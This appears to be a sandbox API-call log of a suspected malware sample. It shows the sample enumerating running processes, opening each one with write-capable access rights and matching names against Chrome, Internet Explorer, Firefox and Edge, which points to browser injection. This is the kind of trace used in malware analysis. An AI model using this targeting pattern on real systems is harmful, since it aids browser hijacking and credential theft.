	[0256.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.463] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.463] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0256.464] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xb2c8
	[0256.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.464] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0256.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.466] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.466] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0256.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.467] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.467] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0256.468] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xb2cc
	[0256.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.468] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0256.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.468] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.469] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0256.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.469] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.469] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.470] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xb2d0
	[0256.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.470] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.470] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.471] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.471] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.471] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.472] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xb2d4
	[0256.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.472] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.472] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.473] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.473] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.473] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.474] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xb2d8
	[0256.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.474] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.475] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.475] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.475] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.475] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.476] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xb2dc
	[0256.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.476] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.477] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.477] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.477] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.477] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.478] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xb2e0
	[0256.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.478] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.479] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.479] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.479] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.479] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.499] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xb2e4
	[0256.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.499] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.499] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.500] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.500] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.500] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.501] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xb2e8
	[0256.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.501] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.501] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.502] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.502] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.502] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0256.503] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xb2ec
	[0256.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.503] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0256.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.503] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.504] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0256.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.504] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.504] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.505] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xb2f0
	[0256.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.505] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.505] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.506] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.506] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.506] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0256.507] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xb2f4
	[0256.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.507] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.508] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.508] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.508] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.509] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0256.510] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xb2f8
	[0256.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.510] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0256.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.510] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.511] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0256.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.511] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.511] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0256.512] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xb2fc
	[0256.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.513] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0256.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.513] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.513] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0256.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.514] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.514] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0256.515] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xb300
	[0256.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.515] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0256.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.515] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.516] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0256.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.516] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.516] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0256.517] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xb304
	[0256.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.517] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0256.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.517] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.518] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0256.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.518] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.518] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0256.519] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xb308
	[0256.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.519] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0256.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.519] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.520] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0256.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.520] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.520] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0256.521] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xb30c
	[0256.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.521] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0256.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.521] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.521] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0256.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.522] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.522] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0256.523] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0256.523] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0256.524] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xb310
	[0256.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.524] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0256.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.524] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.525] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0256.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.525] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.526] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0256.527] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xb314
	[0256.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.527] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0256.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.527] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.527] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0256.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.528] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.528] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0256.529] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xb318
	[0256.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.529] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0256.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.529] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.530] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0256.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.530] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.530] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0256.531] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xb31c
	[0256.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.531] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0256.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.531] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.532] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0256.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.532] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.532] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0256.533] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xb320
	[0256.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.533] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0256.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.534] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.534] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0256.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.535] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0256.535] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0256.536] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xb324
	[0256.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.536] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0256.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.536] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0256.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.537] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0256.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0256.537] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
